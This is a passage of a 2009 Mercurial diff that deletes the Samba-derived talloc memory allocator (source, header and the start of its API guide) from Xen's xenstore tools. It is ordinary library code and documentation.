-       talloc_set_name_const(TC_PTR_FROM_CHUNK(tc), name);
-
-       return TC_PTR_FROM_CHUNK(tc);
-}
-
-/* 
-   move a lump of memory from one talloc context to another return the
-   ptr on success, or NULL if it could not be transferred.
-   passing NULL as ptr will always return NULL with no side effects.
-*/
-void *talloc_steal(const void *new_ctx, const void *ptr)
-{
-       struct talloc_chunk *tc, *new_tc;
-
-       if (!ptr) {
-               return NULL;
-       }
-
-       if (new_ctx == NULL) {
-               new_ctx = null_context;
-       }
-
-       tc = talloc_chunk_from_ptr(ptr);
-
-       if (new_ctx == NULL) {
-               if (tc->parent) {
-                       _TLIST_REMOVE(tc->parent->child, tc);
-                       if (tc->parent->child) {
-                               tc->parent->child->parent = tc->parent;
-                       }
-               } else {
-                       if (tc->prev) tc->prev->next = tc->next;
-                       if (tc->next) tc->next->prev = tc->prev;
-               }
-               
-               tc->parent = tc->next = tc->prev = NULL;
-               return discard_const_p(void, ptr);
-       }
-
-       new_tc = talloc_chunk_from_ptr(new_ctx);
-
-       if (tc == new_tc) {
-               return discard_const_p(void, ptr);
-       }
-
-       if (tc->parent) {
-               _TLIST_REMOVE(tc->parent->child, tc);
-               if (tc->parent->child) {
-                       tc->parent->child->parent = tc->parent;
-               }
-       } else {
-               if (tc->prev) tc->prev->next = tc->next;
-               if (tc->next) tc->next->prev = tc->prev;
-       }
-
-       tc->parent = new_tc;
-       if (new_tc->child) new_tc->child->parent = NULL;
-       _TLIST_ADD(new_tc->child, tc);
-
-       return discard_const_p(void, ptr);
-}
-
-/*
-  return the total size of a talloc pool (subtree)
-*/
-off_t talloc_total_size(const void *ptr)
-{
-       off_t total = 0;
-       struct talloc_chunk *c, *tc;
-       
-       if (ptr == NULL) {
-               ptr = null_context;
-       }
-       if (ptr == NULL) {
-               return 0;
-       }
-
-       tc = talloc_chunk_from_ptr(ptr);
-
-       if (tc->flags & TALLOC_FLAG_LOOP) {
-               return 0;
-       }
-
-       tc->flags |= TALLOC_FLAG_LOOP;
-
-       total = tc->size;
-       for (c=tc->child;c;c=c->next) {
-               total += talloc_total_size(TC_PTR_FROM_CHUNK(c));
-       }
-
-       tc->flags &= ~TALLOC_FLAG_LOOP;
-
-       return total;
-}
-
-/*
-  return the total number of blocks in a talloc pool (subtree)
-*/
-off_t talloc_total_blocks(const void *ptr)
-{
-       off_t total = 0;
-       struct talloc_chunk *c, *tc = talloc_chunk_from_ptr(ptr);
-
-       if (tc->flags & TALLOC_FLAG_LOOP) {
-               return 0;
-       }
-
-       tc->flags |= TALLOC_FLAG_LOOP;
-
-       total++;
-       for (c=tc->child;c;c=c->next) {
-               total += talloc_total_blocks(TC_PTR_FROM_CHUNK(c));
-       }
-
-       tc->flags &= ~TALLOC_FLAG_LOOP;
-
-       return total;
-}
-
-/*
-  return the number of external references to a pointer
-*/
-static int talloc_reference_count(const void *ptr)
-{
-       struct talloc_chunk *tc = talloc_chunk_from_ptr(ptr);
-       struct talloc_reference_handle *h;
-       int ret = 0;
-
-       for (h=tc->refs;h;h=h->next) {
-               ret++;
-       }
-       return ret;
-}
-
-/*
-  report on memory usage by all children of a pointer, giving a full tree view
-*/
-void talloc_report_depth(const void *ptr, FILE *f, int depth)
-{
-       struct talloc_chunk *c, *tc = talloc_chunk_from_ptr(ptr);
-
-       if (tc->flags & TALLOC_FLAG_LOOP) {
-               return;
-       }
-
-       tc->flags |= TALLOC_FLAG_LOOP;
-
-       for (c=tc->child;c;c=c->next) {
-               if (c->name == TALLOC_MAGIC_REFERENCE) {
-                       struct talloc_reference_handle *handle = 
TC_PTR_FROM_CHUNK(c);
-                       const char *name2 = talloc_get_name(handle->ptr);
-                       fprintf(f, "%*sreference to: %s\n", depth*4, "", name2);
-               } else {
-                       const char *name = 
talloc_get_name(TC_PTR_FROM_CHUNK(c));
-                       fprintf(f, "%*s%-30s contains %6lu bytes in %3lu blocks 
(ref %d)\n", 
-                               depth*4, "",
-                               name,
-                               (unsigned 
long)talloc_total_size(TC_PTR_FROM_CHUNK(c)),
-                               (unsigned 
long)talloc_total_blocks(TC_PTR_FROM_CHUNK(c)),
-                               talloc_reference_count(TC_PTR_FROM_CHUNK(c)));
-                       talloc_report_depth(TC_PTR_FROM_CHUNK(c), f, depth+1);
-               }
-       }
-       tc->flags &= ~TALLOC_FLAG_LOOP;
-}
-
-/*
-  report on memory usage by all children of a pointer, giving a full tree view
-*/
-void talloc_report_full(const void *ptr, FILE *f)
-{
-       if (ptr == NULL) {
-               ptr = null_context;
-       }
-       if (ptr == NULL) return;
-
-       fprintf(f,"full talloc report on '%s' (total %lu bytes in %lu 
blocks)\n", 
-               talloc_get_name(ptr), 
-               (unsigned long)talloc_total_size(ptr),
-               (unsigned long)talloc_total_blocks(ptr));
-
-       talloc_report_depth(ptr, f, 1);
-       fflush(f);
-}
-
-/*
-  report on memory usage by all children of a pointer
-*/
-void talloc_report(const void *ptr, FILE *f)
-{
-       struct talloc_chunk *c, *tc;
-
-       if (ptr == NULL) {
-               ptr = null_context;
-       }
-       if (ptr == NULL) return;
-       
-       fprintf(f,"talloc report on '%s' (total %lu bytes in %lu blocks)\n", 
-               talloc_get_name(ptr), 
-               (unsigned long)talloc_total_size(ptr),
-               (unsigned long)talloc_total_blocks(ptr));
-
-       tc = talloc_chunk_from_ptr(ptr);
-
-       for (c=tc->child;c;c=c->next) {
-               fprintf(f, "\t%-30s contains %6lu bytes in %3lu blocks\n", 
-                       talloc_get_name(TC_PTR_FROM_CHUNK(c)),
-                       (unsigned long)talloc_total_size(TC_PTR_FROM_CHUNK(c)),
-                       (unsigned 
long)talloc_total_blocks(TC_PTR_FROM_CHUNK(c)));
-       }
-       fflush(f);
-}
-
-/*
-  report on any memory hanging off the null context
-*/
-static void talloc_report_null(void)
-{
-       if (talloc_total_size(null_context) != 0) {
-               talloc_report(null_context, stderr);
-       }
-}
-
-/*
-  report on any memory hanging off the null context
-*/
-static void talloc_report_null_full(void)
-{
-       if (talloc_total_size(null_context) != 0) {
-               talloc_report_full(null_context, stderr);
-       }
-}
-
-/*
-  enable tracking of the NULL context
-*/
-void talloc_enable_null_tracking(void)
-{
-       if (null_context == NULL) {
-               null_context = talloc_named_const(NULL, 0, "null_context");
-       }
-}
-
-#ifdef _SAMBA_BUILD_
-/* Ugly calls to Samba-specific sprintf_append... JRA. */
-
-/*
-  report on memory usage by all children of a pointer, giving a full tree view
-*/
-static void talloc_report_depth_str(const void *ptr, char **pps, ssize_t 
*plen, size_t *pbuflen, int depth)
-{
-       struct talloc_chunk *c, *tc = talloc_chunk_from_ptr(ptr);
-
-       if (tc->flags & TALLOC_FLAG_LOOP) {
-               return;
-       }
-
-       tc->flags |= TALLOC_FLAG_LOOP;
-
-       for (c=tc->child;c;c=c->next) {
-               if (c->name == TALLOC_MAGIC_REFERENCE) {
-                       struct talloc_reference_handle *handle = 
TC_PTR_FROM_CHUNK(c);
-                       const char *name2 = talloc_get_name(handle->ptr);
-
-                       sprintf_append(NULL, pps, plen, pbuflen,
-                               "%*sreference to: %s\n", depth*4, "", name2);
-
-               } else {
-                       const char *name = 
talloc_get_name(TC_PTR_FROM_CHUNK(c));
-
-                       sprintf_append(NULL, pps, plen, pbuflen,
-                               "%*s%-30s contains %6lu bytes in %3lu blocks 
(ref %d)\n", 
-                               depth*4, "",
-                               name,
-                               (unsigned 
long)talloc_total_size(TC_PTR_FROM_CHUNK(c)),
-                               (unsigned 
long)talloc_total_blocks(TC_PTR_FROM_CHUNK(c)),
-                               talloc_reference_count(TC_PTR_FROM_CHUNK(c)));
-
-                       talloc_report_depth_str(TC_PTR_FROM_CHUNK(c), pps, 
plen, pbuflen, depth+1);
-               }
-       }
-       tc->flags &= ~TALLOC_FLAG_LOOP;
-}
-
-/*
-  report on memory usage by all children of a pointer
-*/
-char *talloc_describe_all(void)
-{
-       ssize_t len = 0;
-       size_t buflen = 512;
-       char *s = NULL;
-
-       if (null_context == NULL) {
-               return NULL;
-       }
-
-       sprintf_append(NULL, &s, &len, &buflen,
-               "full talloc report on '%s' (total %lu bytes in %lu blocks)\n", 
-               talloc_get_name(null_context), 
-               (unsigned long)talloc_total_size(null_context),
-               (unsigned long)talloc_total_blocks(null_context));
-
-       if (!s) {
-               return NULL;
-       }
-       talloc_report_depth_str(null_context, &s, &len, &buflen, 1);
-       return s;
-}
-#endif
-
-/*
-  enable leak reporting on exit
-*/
-void talloc_enable_leak_report(void)
-{
-       talloc_enable_null_tracking();
-       atexit(talloc_report_null);
-}
-
-/*
-  enable full leak reporting on exit
-*/
-void talloc_enable_leak_report_full(void)
-{
-       talloc_enable_null_tracking();
-       atexit(talloc_report_null_full);
-}
-
-/* 
-   talloc and zero memory. 
-*/
-void *_talloc_zero(const void *ctx, size_t size, const char *name)
-{
-       void *p = talloc_named_const(ctx, size, name);
-
-       if (p) {
-               memset(p, '\0', size);
-       }
-
-       return p;
-}
-
-
-/*
-  memdup with a talloc. 
-*/
-void *_talloc_memdup(const void *t, const void *p, size_t size, const char 
*name)
-{
-       void *newp = talloc_named_const(t, size, name);
-
-       if (newp) {
-               memcpy(newp, p, size);
-       }
-
-       return newp;
-}
-
-/*
-  strdup with a talloc 
-*/
-char *talloc_strdup(const void *t, const char *p)
-{
-       char *ret;
-       if (!p) {
-               return NULL;
-       }
-       ret = talloc_memdup(t, p, strlen(p) + 1);
-       if (ret) {
-               talloc_set_name_const(ret, ret);
-       }
-       return ret;
-}
-
-/*
- append to a talloced string 
-*/
-char *talloc_append_string(const void *t, char *orig, const char *append)
-{
-       char *ret;
-       size_t olen = strlen(orig);
-       size_t alenz;
-
-       if (!append)
-               return orig;
-
-       alenz = strlen(append) + 1;
-
-       ret = talloc_realloc(t, orig, char, olen + alenz);
-       if (!ret)
-               return NULL;
-
-       /* append the string with the trailing \0 */
-       memcpy(&ret[olen], append, alenz);
-
-       return ret;
-}
-
-/*
-  strndup with a talloc 
-*/
-char *talloc_strndup(const void *t, const char *p, size_t n)
-{
-       size_t len;
-       char *ret;
-
-       for (len=0; len<n && p[len]; len++) ;
-
-       ret = _talloc(t, len + 1);
-       if (!ret) { return NULL; }
-       memcpy(ret, p, len);
-       ret[len] = 0;
-       talloc_set_name_const(ret, ret);
-       return ret;
-}
-
-#ifndef VA_COPY
-#ifdef HAVE_VA_COPY
-#define VA_COPY(dest, src) va_copy(dest, src)
-#elif defined(HAVE___VA_COPY)
-#define VA_COPY(dest, src) __va_copy(dest, src)
-#else
-#define VA_COPY(dest, src) (dest) = (src)
-#endif
-#endif
-
-char *talloc_vasprintf(const void *t, const char *fmt, va_list ap)
-{      
-       int len;
-       char *ret;
-       va_list ap2;
-       char c;
-       
-       VA_COPY(ap2, ap);
-
-       /* this call looks strange, but it makes it work on older solaris boxes 
*/
-       if ((len = vsnprintf(&c, 1, fmt, ap2)) < 0) {
-               return NULL;
-       }
-
-       ret = _talloc(t, len+1);
-       if (ret) {
-               VA_COPY(ap2, ap);
-               vsnprintf(ret, len+1, fmt, ap2);
-               talloc_set_name_const(ret, ret);
-       }
-
-       return ret;
-}
-
-
-/*
-  Perform string formatting, and return a pointer to newly allocated
-  memory holding the result, inside a memory pool.
- */
-char *talloc_asprintf(const void *t, const char *fmt, ...)
-{
-       va_list ap;
-       char *ret;
-
-       va_start(ap, fmt);
-       ret = talloc_vasprintf(t, fmt, ap);
-       va_end(ap);
-       return ret;
-}
-
-
-/**
- * Realloc @p s to append the formatted result of @p fmt and @p ap,
- * and return @p s, which may have moved.  Good for gradually
- * accumulating output into a string buffer.
- **/
-
-static char *talloc_vasprintf_append(char *s, const char *fmt, va_list ap) 
PRINTF_ATTRIBUTE(2,0);
-
-static char *talloc_vasprintf_append(char *s, const char *fmt, va_list ap)
-{      
-       struct talloc_chunk *tc;
-       int len, s_len;
-       va_list ap2;
-
-       if (s == NULL) {
-               return talloc_vasprintf(NULL, fmt, ap);
-       }
-
-       tc = talloc_chunk_from_ptr(s);
-
-       VA_COPY(ap2, ap);
-
-       s_len = tc->size - 1;
-       if ((len = vsnprintf(NULL, 0, fmt, ap2)) <= 0) {
-               /* Either the vsnprintf failed or the format resulted in
-                * no characters being formatted. In the former case, we
-                * ought to return NULL, in the latter we ought to return
-                * the original string. Most current callers of this 
-                * function expect it to never return NULL.
-                */
-               return s;
-       }
-
-       s = talloc_realloc(NULL, s, char, s_len + len+1);
-       if (!s) return NULL;
-
-       VA_COPY(ap2, ap);
-
-       vsnprintf(s+s_len, len+1, fmt, ap2);
-       talloc_set_name_const(s, s);
-
-       return s;
-}
-
-/*
-  Realloc @p s to append the formatted result of @p fmt and return @p
-  s, which may have moved.  Good for gradually accumulating output
-  into a string buffer.
- */
-char *talloc_asprintf_append(char *s, const char *fmt, ...)
-{
-       va_list ap;
-
-       va_start(ap, fmt);
-       s = talloc_vasprintf_append(s, fmt, ap);
-       va_end(ap);
-       return s;
-}
-
-/*
-  alloc an array, checking for integer overflow in the array size
-*/
-void *_talloc_array(const void *ctx, size_t el_size, unsigned count, const 
char *name)
-{
-       if (count >= MAX_TALLOC_SIZE/el_size) {
-               return NULL;
-       }
-       return talloc_named_const(ctx, el_size * count, name);
-}
-
-/*
-  alloc an zero array, checking for integer overflow in the array size
-*/
-void *_talloc_zero_array(const void *ctx, size_t el_size, unsigned count, 
const char *name)
-{
-       if (count >= MAX_TALLOC_SIZE/el_size) {
-               return NULL;
-       }
-       return _talloc_zero(ctx, el_size * count, name);
-}
-
-
-/*
-  realloc an array, checking for integer overflow in the array size
-*/
-void *_talloc_realloc_array(const void *ctx, void *ptr, size_t el_size, 
unsigned count, const char *name)
-{
-       if (count >= MAX_TALLOC_SIZE/el_size) {
-               return NULL;
-       }
-       return _talloc_realloc(ctx, ptr, el_size * count, name);
-}
-
-/*
-  a function version of talloc_realloc(), so it can be passed as a function 
pointer
-  to libraries that want a realloc function (a realloc function encapsulates
-  all the basic capabilities of an allocation library, which is why this is 
useful)
-*/
-void *talloc_realloc_fn(const void *context, void *ptr, size_t size)
-{
-       return _talloc_realloc(context, ptr, size, NULL);
-}
-
-
-static void talloc_autofree(void)
-{
-       talloc_free(cleanup_context);
-       cleanup_context = NULL;
-}
-
-/*
-  return a context which will be auto-freed on exit
-  this is useful for reducing the noise in leak reports
-*/
-void *talloc_autofree_context(void)
-{
-       if (cleanup_context == NULL) {
-               cleanup_context = talloc_named_const(NULL, 0, 
"autofree_context");
-               atexit(talloc_autofree);
-       }
-       return cleanup_context;
-}
-
-size_t talloc_get_size(const void *context)
-{
-       struct talloc_chunk *tc;
-
-       if (context == NULL)
-               return 0;
-
-       tc = talloc_chunk_from_ptr(context);
-
-       return tc->size;
-}
-
-/*
-  find a parent of this context that has the given name, if any
-*/
-void *talloc_find_parent_byname(const void *context, const char *name)
-{
-       struct talloc_chunk *tc;
-
-       if (context == NULL) {
-               return NULL;
-       }
-
-       tc = talloc_chunk_from_ptr(context);
-       while (tc) {
-               if (tc->name && strcmp(tc->name, name) == 0) {
-                       return TC_PTR_FROM_CHUNK(tc);
-               }
-               while (tc && tc->prev) tc = tc->prev;
-               tc = tc->parent;
-       }
-       return NULL;
-}
-
-/*
-  show the parentage of a context
-*/
-void talloc_show_parents(const void *context, FILE *file)
-{
-       struct talloc_chunk *tc;
-
-       if (context == NULL) {
-               fprintf(file, "talloc no parents for NULL\n");
-               return;
-       }
-
-       tc = talloc_chunk_from_ptr(context);
-       fprintf(file, "talloc parents of '%s'\n", talloc_get_name(context));
-       while (tc) {
-               fprintf(file, "\t'%s'\n", 
talloc_get_name(TC_PTR_FROM_CHUNK(tc)));
-               while (tc && tc->prev) tc = tc->prev;
-               tc = tc->parent;
-       }
-}
diff -r 10a8fae412c5 tools/xenstore/talloc.h
--- a/tools/xenstore/talloc.h   Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,144 +0,0 @@
-#ifndef _TALLOC_H_
-#define _TALLOC_H_
-/* 
-   Unix SMB/CIFS implementation.
-   Samba temporary memory allocation functions
-
-   Copyright (C) Andrew Tridgell 2004-2005
-   
-     ** NOTE! The following LGPL license applies to the talloc
-     ** library. This does NOT imply that all of Samba is released
-     ** under the LGPL
-   
-   This library is free software; you can redistribute it and/or
-   modify it under the terms of the GNU Lesser General Public
-   License as published by the Free Software Foundation; either
-   version 2 of the License, or (at your option) any later version.
-
-   This library is distributed in the hope that it will be useful,
-   but WITHOUT ANY WARRANTY; without even the implied warranty of
-   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
-   Lesser General Public License for more details.
-
-   You should have received a copy of the GNU Lesser General Public
-   License along with this library; if not, write to the Free Software
-   Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
-*/
-
-/* this is only needed for compatibility with the old talloc */
-typedef void TALLOC_CTX;
-
-/*
-  this uses a little trick to allow __LINE__ to be stringified
-*/
-#define _STRING_LINE_(s)    #s
-#define _STRING_LINE2_(s)   _STRING_LINE_(s)
-#define __LINESTR__       _STRING_LINE2_(__LINE__)
-#define __location__ __FILE__ ":" __LINESTR__
-
-#ifndef TALLOC_DEPRECATED
-#define TALLOC_DEPRECATED 0
-#endif
-
-/* useful macros for creating type checked pointers */
-#define talloc(ctx, type) (type *)talloc_named_const(ctx, sizeof(type), #type)
-#define talloc_size(ctx, size) talloc_named_const(ctx, size, __location__)
-
-#define talloc_new(ctx) talloc_named_const(ctx, 0, "talloc_new: " __location__)
-
-#define talloc_zero(ctx, type) (type *)_talloc_zero(ctx, sizeof(type), #type)
-#define talloc_zero_size(ctx, size) _talloc_zero(ctx, size, __location__)
-
-#define talloc_zero_array(ctx, type, count) (type *)_talloc_zero_array(ctx, 
sizeof(type), count, #type)
-#define talloc_array(ctx, type, count) (type *)_talloc_array(ctx, 
sizeof(type), count, #type)
-#define talloc_array_size(ctx, size, count) _talloc_array(ctx, size, count, 
__location__)
-
-#define talloc_realloc(ctx, p, type, count) (type *)_talloc_realloc_array(ctx, 
p, sizeof(type), count, #type)
-#define talloc_realloc_size(ctx, ptr, size) _talloc_realloc(ctx, ptr, size, 
__location__)
-
-#define talloc_memdup(t, p, size) _talloc_memdup(t, p, size, __location__)
-
-#define malloc_p(type) (type *)malloc(sizeof(type))
-#define malloc_array_p(type, count) (type *)realloc_array(NULL, sizeof(type), 
count)
-#define realloc_p(p, type, count) (type *)realloc_array(p, sizeof(type), count)
-
-#if 0 
-/* Not correct for Samba3. */
-#define data_blob(ptr, size) data_blob_named(ptr, size, "DATA_BLOB: 
"__location__)
-#define data_blob_talloc(ctx, ptr, size) data_blob_talloc_named(ctx, ptr, 
size, "DATA_BLOB: "__location__)
-#define data_blob_dup_talloc(ctx, blob) data_blob_talloc_named(ctx, 
(blob)->data, (blob)->length, "DATA_BLOB: "__location__)
-#endif
-
-#define talloc_set_type(ptr, type) talloc_set_name_const(ptr, #type)
-#define talloc_get_type(ptr, type) (type *)talloc_check_name(ptr, #type)
-
-#define talloc_find_parent_bytype(ptr, type) (type 
*)talloc_find_parent_byname(ptr, #type)
-
-
-#if TALLOC_DEPRECATED
-#define talloc_zero_p(ctx, type) talloc_zero(ctx, type)
-#define talloc_p(ctx, type) talloc(ctx, type)
-#define talloc_array_p(ctx, type, count) talloc_array(ctx, type, count)
-#define talloc_realloc_p(ctx, p, type, count) talloc_realloc(ctx, p, type, 
count)
-#define talloc_destroy(ctx) talloc_free(ctx)
-#endif
-
-#ifndef PRINTF_ATTRIBUTE
-#if (__GNUC__ >= 3)
-/** Use gcc attribute to check printf fns.  a1 is the 1-based index of
- * the parameter containing the format, and a2 the index of the first
- * argument. Note that some gcc 2.x versions don't handle this
- * properly **/
-#define PRINTF_ATTRIBUTE(a1, a2) __attribute__ ((format (__printf__, a1, a2)))
-#else
-#define PRINTF_ATTRIBUTE(a1, a2)
-#endif
-#endif
-
-
-/* The following definitions come from talloc.c  */
-void *_talloc(const void *context, size_t size);
-void talloc_set_destructor(const void *ptr, int (*destructor)(void *));
-void talloc_increase_ref_count(const void *ptr);
-void *talloc_reference(const void *context, const void *ptr);
-int talloc_unlink(const void *context, void *ptr);
-void talloc_set_name(const void *ptr, const char *fmt, ...) 
PRINTF_ATTRIBUTE(2,3);
-void talloc_set_name_const(const void *ptr, const char *name);
-void *talloc_named(const void *context, size_t size, 
-                  const char *fmt, ...) PRINTF_ATTRIBUTE(3,4);
-void *talloc_named_const(const void *context, size_t size, const char *name);
-const char *talloc_get_name(const void *ptr);
-void *talloc_check_name(const void *ptr, const char *name);
-void talloc_report_depth(const void *ptr, FILE *f, int depth);
-void *talloc_parent(const void *ptr);
-void *talloc_init(const char *fmt, ...) PRINTF_ATTRIBUTE(1,2);
-int talloc_free(void *ptr);
-void *_talloc_realloc(const void *context, void *ptr, size_t size, const char 
*name);
-void *talloc_steal(const void *new_ctx, const void *ptr);
-off_t talloc_total_size(const void *ptr);
-off_t talloc_total_blocks(const void *ptr);
-void talloc_report_full(const void *ptr, FILE *f);
-void talloc_report(const void *ptr, FILE *f);
-void talloc_enable_null_tracking(void);
-void talloc_enable_leak_report(void);
-void talloc_enable_leak_report_full(void);
-void *_talloc_zero(const void *ctx, size_t size, const char *name);
-void *_talloc_memdup(const void *t, const void *p, size_t size, const char 
*name);
-char *talloc_strdup(const void *t, const char *p);
-char *talloc_strndup(const void *t, const char *p, size_t n);
-char *talloc_append_string(const void *t, char *orig, const char *append);
-char *talloc_vasprintf(const void *t, const char *fmt, va_list ap) 
PRINTF_ATTRIBUTE(2,0);
-char *talloc_asprintf(const void *t, const char *fmt, ...) 
PRINTF_ATTRIBUTE(2,3);
-char *talloc_asprintf_append(char *s,
-                            const char *fmt, ...) PRINTF_ATTRIBUTE(2,3);
-void *_talloc_array(const void *ctx, size_t el_size, unsigned count, const 
char *name);
-void *_talloc_zero_array(const void *ctx, size_t el_size, unsigned count, 
const char *name);
-void *_talloc_realloc_array(const void *ctx, void *ptr, size_t el_size, 
unsigned count, const char *name);
-void *talloc_realloc_fn(const void *context, void *ptr, size_t size);
-void *talloc_autofree_context(void);
-size_t talloc_get_size(const void *ctx);
-void *talloc_find_parent_byname(const void *ctx, const char *name);
-void talloc_show_parents(const void *context, FILE *file);
-
-#endif
-
diff -r 10a8fae412c5 tools/xenstore/talloc_guide.txt
--- a/tools/xenstore/talloc_guide.txt   Wed Jan 14 13:43:17 2009 +0000
+++ /dev/null   Thu Jan 01 00:00:00 1970 +0000
@@ -1,569 +0,0 @@
-Using talloc in Samba4
-----------------------
-
-Andrew Tridgell
-September 2004
-
-The most current version of this document is available at
-   http://samba.org/ftp/unpacked/samba4/source/lib/talloc/talloc_guide.txt
-
-If you are used to talloc from Samba3 then please read this carefully,
-as talloc has changed a lot.
-
-The new talloc is a hierarchical, reference counted memory pool system
-with destructors. Quite a mounthful really, but not too bad once you
-get used to it.
-
-Perhaps the biggest change from Samba3 is that there is no distinction
-between a "talloc context" and a "talloc pointer". Any pointer
-returned from talloc() is itself a valid talloc context. This means
-you can do this:
-
-  struct foo *X = talloc(mem_ctx, struct foo);
-  X->name = talloc_strdup(X, "foo");
-
-and the pointer X->name would be a "child" of the talloc context "X"
-which is itself a child of mem_ctx. So if you do talloc_free(mem_ctx)
-then it is all destroyed, whereas if you do talloc_free(X) then just X
-and X->name are destroyed, and if you do talloc_free(X->name) then
-just the name element of X is destroyed.
-
-If you think about this, then what this effectively gives you is an
-n-ary tree, where you can free any part of the tree with
-talloc_free().
-
-If you find this confusing, then I suggest you run the testsuite to
-watch talloc in action. You may also like to add your own tests to
-testsuite.c to clarify how some particular situation is handled.
-
-
-Performance
------------
-
-All the additional features of talloc() over malloc() do come at a
-price. We have a simple performance test in Samba4 that measures
-talloc() versus malloc() performance, and it seems that talloc() is
-about 10% slower than malloc() on my x86 Debian Linux box. For Samba,
-the great reduction in code complexity that we get by using talloc
-makes this worthwhile, especially as the total overhead of
-talloc/malloc in Samba is already quite small.
-
-
-talloc API
-----------
-
-The following is a complete guide to the talloc API. Read it all at
-least twice.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-(type *)talloc(const void *context, type);
-
-The talloc() macro is the core of the talloc library. It takes a
-memory context and a type, and returns a pointer to a new area of
-memory of the given type.
-
-The returned pointer is itself a talloc context, so you can use it as
-the context argument to more calls to talloc if you wish.
-
-The returned pointer is a "child" of the supplied context. This means
-that if you talloc_free() the context then the new child disappears as
-well. Alternatively you can free just the child.
-
-The context argument to talloc() can be NULL, in which case a new top
-level context is created. 
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_size(const void *context, size_t size);
-
-The function talloc_size() should be used when you don't have a
-convenient type to pass to talloc(). Unlike talloc(), it is not type
-safe (as it returns a void *), so you are on your own for type checking.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-int talloc_free(void *ptr);
-
-The talloc_free() function frees a piece of talloc memory, and all its
-children. You can call talloc_free() on any pointer returned by
-talloc().
-
-The return value of talloc_free() indicates success or failure, with 0
-returned for success and -1 for failure. The only possible failure
-condition is if the pointer had a destructor attached to it and the
-destructor returned -1. See talloc_set_destructor() for details on
-destructors.
-
-If this pointer has an additional parent when talloc_free() is called
-then the memory is not actually released, but instead the most
-recently established parent is destroyed. See talloc_reference() for
-details on establishing additional parents.
-
-For more control on which parent is removed, see talloc_unlink()
-
-talloc_free() operates recursively on its children.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-int talloc_free_children(void *ptr);
-
-The talloc_free_children() walks along the list of all children of a
-talloc context and talloc_free()s only the children, not the context
-itself.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void *talloc_reference(const void *context, const void *ptr);
-
-The talloc_reference() function makes "context" an additional parent
-of "ptr".
-
-The return value of talloc_reference() is always the original pointer
-"ptr", unless talloc ran out of memory in creating the reference in
-which case it will return NULL (each additional reference consumes
-around 48 bytes of memory on intel x86 platforms).
-
-If "ptr" is NULL, then the function is a no-op, and simply returns NULL.
-
-After creating a reference you can free it in one of the following
-ways:
-
-  - you can talloc_free() any parent of the original pointer. That
-    will reduce the number of parents of this pointer by 1, and will
-    cause this pointer to be freed if it runs out of parents.
-
-  - you can talloc_free() the pointer itself. That will destroy the
-    most recently established parent to the pointer and leave the
-    pointer as a child of its current parent.
-
-For more control on which parent to remove, see talloc_unlink()
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-int talloc_unlink(const void *context, const void *ptr);
-
-The talloc_unlink() function removes a specific parent from ptr. The
-context passed must either be a context used in talloc_reference()
-with this pointer, or must be a direct parent of ptr. 
-
-Note that if the parent has already been removed using talloc_free()
-then this function will fail and will return -1.  Likewise, if "ptr"
-is NULL, then the function will make no modifications and return -1.
-
-Usually you can just use talloc_free() instead of talloc_unlink(), but
-sometimes it is useful to have the additional control on which parent
-is removed.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void talloc_set_destructor(const void *ptr, int (*destructor)(void *));
-
-The function talloc_set_destructor() sets the "destructor" for the
-pointer "ptr". A destructor is a function that is called when the
-memory used by a pointer is about to be released. The destructor
-receives the pointer as an argument, and should return 0 for success
-and -1 for failure.
-
-The destructor can do anything it wants to, including freeing other
-pieces of memory. A common use for destructors is to clean up
-operating system resources (such as open file descriptors) contained
-in the structure the destructor is placed on.
-
-You can only place one destructor on a pointer. If you need more than
-one destructor then you can create a zero-length child of the pointer
-and place an additional destructor on that.
-
-To remove a destructor call talloc_set_destructor() with NULL for the
-destructor.
-
-If your destructor attempts to talloc_free() the pointer that it is
-the destructor for then talloc_free() will return -1 and the free will
-be ignored. This would be a pointless operation anyway, as the
-destructor is only called when the memory is just about to go away.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void talloc_increase_ref_count(const void *ptr);
-
-The talloc_increase_ref_count(ptr) function is exactly equivalent to:
-
-  talloc_reference(NULL, ptr);
-
-You can use either syntax, depending on which you think is clearer in
-your code.
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void talloc_set_name(const void *ptr, const char *fmt, ...);
-
-Each talloc pointer has a "name". The name is used principally for
-debugging purposes, although it is also possible to set and get the
-name on a pointer in as a way of "marking" pointers in your code.
-
-The main use for names on pointer is for "talloc reports". See
-talloc_report() and talloc_report_full() for details. Also see
-talloc_enable_leak_report() and talloc_enable_leak_report_full().
-
-The talloc_set_name() function allocates memory as a child of the
-pointer. It is logically equivalent to:
-  talloc_set_name_const(ptr, talloc_asprintf(ptr, fmt, ...));
-
-Note that multiple calls to talloc_set_name() will allocate more
-memory without releasing the name. All of the memory is released when
-the ptr is freed using talloc_free().
-
-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
-void talloc_set_name_const(const void *ptr, const char *name);
-
-The function talloc_set_name_const() is just like talloc_set_name(),
-but it takes a string constant, and is much faster. It is extensively
-used by the "auto naming" macros, such as talloc_p().
-
